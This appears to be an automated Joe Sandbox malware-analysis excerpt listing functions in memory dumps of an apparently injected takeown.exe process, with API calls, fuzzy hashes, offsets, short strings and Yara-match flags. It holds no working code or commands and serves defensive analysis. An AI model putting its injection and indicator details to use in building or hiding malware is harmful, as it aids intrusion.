Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45a5e225b91e4999bfebfa0e650db6503aac2f1990b9e0da994c64cff4473072
Instruction ID: 071661125e2b58cfab025e09b611d7e3d3987f5f1208c4680a433f1d59bad362
Opcode Fuzzy Hash: 45a5e225b91e4999bfebfa0e650db6503aac2f1990b9e0da994c64cff4473072
Instruction Fuzzy Hash: A790023160540C12F550B15854547460005C7D1301F55C122A0028664D87558B5576A6

Uniqueness

Uniqueness Score: -1.00%

Function 03782AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782AFA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f266e0381ddb9db724d21084e03f3d58f87732841b647961261cda75d84c07a5
Instruction ID: 0f2797b5aac2a318a0ee554d79791718280aa9b3ec5ba6666d5dc88a7f81ab8d
Opcode Fuzzy Hash: f266e0381ddb9db724d21084e03f3d58f87732841b647961261cda75d84c07a5
Instruction Fuzzy Hash: A2900225221404122545F558164450B0445D7D7351395C126F141A5A0CC72189655326

Uniqueness

Uniqueness Score: -1.00%

Function 03782AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782ADA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0ef7ec3e277ec42a25bacfaf764d7a3bb65058d84360ae7f0e1dcd54f5fd895
Instruction ID: 9a21133b1fc49038fc3f3a853d724250a85de49e7c2c736859dac800e07179f0
Opcode Fuzzy Hash: b0ef7ec3e277ec42a25bacfaf764d7a3bb65058d84360ae7f0e1dcd54f5fd895
Instruction Fuzzy Hash: 6C900435311404133505F55C17445070047C7D7351355C133F101D570CD731CD715137

Uniqueness

Uniqueness Score: -1.00%

Function 03782F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782F3A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5181a0ca34678a8c438d5cbfca3127bc93adf8c6935eeb277087730cc874329
Instruction ID: d04716cd4be674c4815a9dc56ac739c4f3f50a38ce08ad49dd2b127b0153323b
Opcode Fuzzy Hash: b5181a0ca34678a8c438d5cbfca3127bc93adf8c6935eeb277087730cc874329
Instruction Fuzzy Hash: 3690026134140852F500B1585454B060005C7E2301F55C126E1068564D8719CD52612B

Uniqueness

Uniqueness Score: -1.00%

Function 03782FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782FEA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 296521bc60971b4f78976c80e974974f106ea796a9114fcd3c9d5752104cabed
Instruction ID: f5c3f6ac02888de9ce7c3e43eb8fdb1878db0d07bf9250965997e4eca92de3af
Opcode Fuzzy Hash: 296521bc60971b4f78976c80e974974f106ea796a9114fcd3c9d5752104cabed
Instruction Fuzzy Hash: 04900221211C0452F600B5685C54B070005C7D1303F55C226A0158564CCA1589615526

Uniqueness

Uniqueness Score: -1.00%

Function 03782FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782FBA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0683255fbf6da726fda289f49abbb1bf96e3905d4c3d2ed188624e4af0e12be1
Instruction ID: decb9279f6058541706102fdf561fac1601be6104c964e3c6418d7204c413213
Opcode Fuzzy Hash: 0683255fbf6da726fda289f49abbb1bf96e3905d4c3d2ed188624e4af0e12be1
Instruction Fuzzy Hash: A8900221601404526540B16898849064005EBE2211755C232A099C560D86598965566A

Uniqueness

Uniqueness Score: -1.00%

Function 03782EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782EEA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87435bfcbfbe1f2b27b4625e0b940e41dbfc7803a351bfe4303aaaee4bdc2bf1
Instruction ID: 77d5e8f5fa557ecc050c1b1359dc6222897daec28a4efff87d606bd3d86b8a08
Opcode Fuzzy Hash: 87435bfcbfbe1f2b27b4625e0b940e41dbfc7803a351bfe4303aaaee4bdc2bf1
Instruction Fuzzy Hash: F590026120180813F540B55858446070005C7D1302F55C122A2068565E8B298D51613A

Uniqueness

Uniqueness Score: -1.00%

Function 03782E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782E8A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e5c1a1401f7b4060c124a2dc4e6b022177083d2d60fbae3f8b31b992587c765
Instruction ID: 0ea23371896ef62993587420780ab0148e5a318fef40f814e9106f4a61bbc40c
Opcode Fuzzy Hash: 9e5c1a1401f7b4060c124a2dc4e6b022177083d2d60fbae3f8b31b992587c765
Instruction Fuzzy Hash: 2790022160140912F501B1585444616000AC7D1241F95C133A1028565ECB258A92A136

Uniqueness

Uniqueness Score: -1.00%

Function 03782D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782D3A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8398ac6ea0fe29f9f83167fddda1a70a2f5d418ca3940220e7efa218b7fa091
Instruction ID: 32b81d002cbb13939170ad5a159957ba0781b02905acbade8a6a5058d83139e7
Opcode Fuzzy Hash: a8398ac6ea0fe29f9f83167fddda1a70a2f5d418ca3940220e7efa218b7fa091
Instruction Fuzzy Hash: DF90022130140413F540B15864586064005D7E2301F55D122E0418564CDA1589565227

Uniqueness

Uniqueness Score: -1.00%

Function 03782D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782D1A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 237cbe4934b3994ee8fd092ab5bf8ea9b801d8bc50e2d5b38aa6fe8c6b0b81c7
Instruction ID: 81f0f07ae139d2eb638b638749468fed40efbe417d0ddd1fe1c35835baccd238
Opcode Fuzzy Hash: 237cbe4934b3994ee8fd092ab5bf8ea9b801d8bc50e2d5b38aa6fe8c6b0b81c7
Instruction Fuzzy Hash: C690022921340412F580B158644860A0005C7D2202F95D526A0019568CCA1589695326

Uniqueness

Uniqueness Score: -1.00%

Function 03782DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782DFA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8d5531496633e75195c421278d303844fb8dbf1ba3d56a0b4a16771b4dd27df
Instruction ID: d9d55e7596e3c76fcc708b12fa735a63d44b7a27a5e46added42336c36e18653
Opcode Fuzzy Hash: f8d5531496633e75195c421278d303844fb8dbf1ba3d56a0b4a16771b4dd27df
Instruction Fuzzy Hash: 9090023120140823F511B15855447070009C7D1241F95C523A0428568D97568A52A126

Uniqueness

Uniqueness Score: -1.00%

Function 03782DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782DDA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 490d26608a316f1d0436ecf62925ae565528f0aff3dd1c2b8dc45f620696cb9b
Instruction ID: 98bde5b38675a3cbf07954867098b8559688ab1650a6bfa71b50cf76d03b3530
Opcode Fuzzy Hash: 490d26608a316f1d0436ecf62925ae565528f0aff3dd1c2b8dc45f620696cb9b
Instruction Fuzzy Hash: C6900221242445627945F15854445074006D7E1241795C123A1418960C86269956D626

Uniqueness

Uniqueness Score: -1.00%

Function 03782C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782C7A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e52de754bccb4cede59c69a3b7538a229b2f34f6c1eb234a91e1dd92dc26028
Instruction ID: 2c0df954c550650c8e295fa8726d19e4e6e47a7d9cdc03d7604a9fead09c6ead
Opcode Fuzzy Hash: 8e52de754bccb4cede59c69a3b7538a229b2f34f6c1eb234a91e1dd92dc26028
Instruction Fuzzy Hash: 3B90023120148C12F510B158944474A0005C7D1301F59C522A4428668D879589917126

Uniqueness

Uniqueness Score: -1.00%

Function 03782C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782C6A

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec5241109cda60ba055812bfdc7b6a6d2c33ea0006a88b5d14d7d7f6c1c0e84b
Instruction ID: 9b23ff47f6ad43b833ab7b636d2fdc5c8d5d604ffc5a6a3aa009f0eabf3aded1
Opcode Fuzzy Hash: ec5241109cda60ba055812bfdc7b6a6d2c33ea0006a88b5d14d7d7f6c1c0e84b
Instruction Fuzzy Hash: 5590023120140C52F500B1585444B460005C7E1301F55C127A0128664D8715C9517526

Uniqueness

Uniqueness Score: -1.00%

Function 03782CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782CAA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97d98333b332469f9d1b6d72e1c2712f5efee6d4a64f08c35f9f44c6a405f431
Instruction ID: 25413dab74ef33e472425dcce1f57a2e4fd8bac3e4244dff5551ba0c27b58201
Opcode Fuzzy Hash: 97d98333b332469f9d1b6d72e1c2712f5efee6d4a64f08c35f9f44c6a405f431
Instruction Fuzzy Hash: 9190023120140812F500B59864486460005C7E1301F55D122A5028565EC76589916136

Uniqueness

Uniqueness Score: -1.00%

Function 037835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037835CA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f3fdbc46fc1af8103ede1b7416f0fb0a1274c359a286718be713df201177557
Instruction ID: cdd6a5c7a3629239e00254a7a27ef746ebc7d9edc4072d41e085c3983472da45
Opcode Fuzzy Hash: 6f3fdbc46fc1af8103ede1b7416f0fb0a1274c359a286718be713df201177557
Instruction Fuzzy Hash: 9190023160550812F500B15855547061005C7D1201F65C522A0428578D87958A5165A7

Uniqueness

Uniqueness Score: -1.00%

Function 037839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037839BA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 045a21ffa7f05402aadf2f1934cb835891369d094e26af39b0cd20ea9579d1f5
Instruction ID: fb4dbfba9ffe381648afd9c60c855a362edabe9e5f5369765426c43603faf2d7
Opcode Fuzzy Hash: 045a21ffa7f05402aadf2f1934cb835891369d094e26af39b0cd20ea9579d1f5
Instruction Fuzzy Hash: 9490022124545512F550B15C54446164005E7E1201F55C132A08185A4D865589556226

Uniqueness

Uniqueness Score: -1.00%

Function 02F09228 Relevance: 64.9, APIs: 1, Strings: 36, Instructions: 167
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F09275

Strings

m, xrefs: 02F094F3
Yh, xrefs: 02F09665
*, xrefs: 02F09572
P, xrefs: 02F092DB
(-, xrefs: 02F095D4
k, xrefs: 02F092FD
d, xrefs: 02F09433
26, xrefs: 02F092B8
r-, xrefs: 02F0965E
(, xrefs: 02F09625
Z9, xrefs: 02F0961B
dS, xrefs: 02F092C6
h', xrefs: 02F09657
=, xrefs: 02F093BA
?, xrefs: 02F094DF
Q,, xrefs: 02F09643
6, xrefs: 02F09451
<, xrefs: 02F093C4
U, xrefs: 02F093E6
[, xrefs: 02F09554
)E, xrefs: 02F096A8
aw, xrefs: 02F095C0
~, xrefs: 02F093A6
+v, xrefs: 02F0966F
@, xrefs: 02F09429
o, xrefs: 02F094A5
K , xrefs: 02F095A2
S;, xrefs: 02F09639
C, xrefs: 02F09568
d, xrefs: 02F094E9
2<, xrefs: 02F092CD
l, xrefs: 02F0957C
o, xrefs: 02F09392
+, xrefs: 02F0931B
k), xrefs: 02F09697
E, xrefs: 02F0939C

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: (-$)E$*$+$+v$26$2<$6$<$=$?$@$C$E$K $P$Q,$S;$Yh$Z9$[$aw$d$d$dS$h'$k$k)$m$o$o$r-$~$($U$l
API String ID: 2422867632-760000345
Opcode ID: d32dd60d8401dc43b481dffb54bb5466025e9fc684a1645a748b61f1b5a3dae5
Instruction ID: 81916d2a754c3d40942e8ba4f0ae5ca4746d2142a6bb2e4c06780ba20379b901
Opcode Fuzzy Hash: d32dd60d8401dc43b481dffb54bb5466025e9fc684a1645a748b61f1b5a3dae5
Instruction Fuzzy Hash: D6B149B0D05769DBFB618F41C9987CEBAB1BB05708F1085C9D25C3B281C7BA1A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02F1064C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 02F10747

Strings

43PI9J, xrefs: 02F1074E, 02F10751
43PI9J, xrefs: 02F1073C, 02F10746, 02F10757

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: 19fa5fd16c7e0924efb93434e3c3bcec3c7aea9b161f65a4cd9403ee2f00e823
Instruction ID: b2a989d5f733cbb255b5351edf6964ec1ab127895e8d3673c5330313cf695a00
Opcode Fuzzy Hash: 19fa5fd16c7e0924efb93434e3c3bcec3c7aea9b161f65a4cd9403ee2f00e823
Instruction Fuzzy Hash: C2210471D0125CBAEB219BF08C81DDF7BBC9F463A4F444569EA54AB140DA644E0A8FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F106CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 02F10747

Strings

43PI9J, xrefs: 02F1074E, 02F10751
43PI9J, xrefs: 02F1073C, 02F10746, 02F10757

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: d9037f41c1c242129af66843e71cfea134991a9da7fc8bbeab4287586c3ab97c
Instruction ID: c9e28106cee5a2d48906ba7155787ced7447619a559c038360ccc66314e222a0
Opcode Fuzzy Hash: d9037f41c1c242129af66843e71cfea134991a9da7fc8bbeab4287586c3ab97c
Instruction Fuzzy Hash: F2018EB2D4021C7EEB10AAE18C81DEFBB6CDF417D4F408068FB04A7140DA645E0A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F106D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 02F10747

Strings

43PI9J, xrefs: 02F1074E, 02F10751
43PI9J, xrefs: 02F1073C, 02F10746, 02F10757

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: 1ed7fbba6a40b0eccc5e22e22def62be637151e629ae155a045f243be55d4169
Instruction ID: 190b8b54b464fc5c0b7120afdac742024ef0b474d9104260b8bff3f15f8d0117
Opcode Fuzzy Hash: 1ed7fbba6a40b0eccc5e22e22def62be637151e629ae155a045f243be55d4169
Instruction Fuzzy Hash: DC0161B2D4125C7AEB11AAE58C81DEFBB7CDF417D4F448068FB14A7140D6645E0A8FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F227E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02F228AB

Strings

net.dll, xrefs: 02F22877, 02F228FA, 02F228D2, 02F228DE, 02F22906
wininet.dll, xrefs: 02F2284E, 02F2285A

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 272f6a30f503d508c959af628f23fd9675f8e934e2bf7629f02a3a42f833eff4
Instruction ID: b62d7a1bb8091a14f66322d3cf48b9af8e296a2ad2b190d348ae49da1b067cf8
Opcode Fuzzy Hash: 272f6a30f503d508c959af628f23fd9675f8e934e2bf7629f02a3a42f833eff4
Instruction Fuzzy Hash: D6318DB1A01304ABD714DF64CC80FE7BBA9EF89744F00451DEA595B244D7B0B648CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F1E86A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02F1E887

Strings

@J7<, xrefs: 02F1E89B

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: be88ecf9c52ec08706b07f4ad4c8513a88ece7f884f690fcac2359ab468f04fd
Instruction ID: 76df375bcb7dfbabd77575bc94266bc36b5c5c6f5cab81306d1f5b783cc160dd
Opcode Fuzzy Hash: be88ecf9c52ec08706b07f4ad4c8513a88ece7f884f690fcac2359ab468f04fd
Instruction Fuzzy Hash: A2315275E0060AAFDB10DFD8C8809EFB7B9FF88304B508559EA05EB214D771AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F1E870 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02F1E887

Strings

@J7<, xrefs: 02F1E89B

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 596b4ffa0084f302ce82effa2123405c1bda6d34144c98f9774bcb7938fe229c
Instruction ID: 0185df6bfe70ea3f7ec7bca8b70e999adcee761adb8cfef930c6902b3370736e
Opcode Fuzzy Hash: 596b4ffa0084f302ce82effa2123405c1bda6d34144c98f9774bcb7938fe229c
Instruction Fuzzy Hash: BC3110B5A0060A9FDB10DFD8D8809EEB7B9BF88304F508559EA15A7214D775AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F14093 Relevance: 1.6, APIs: 1, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F14112

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
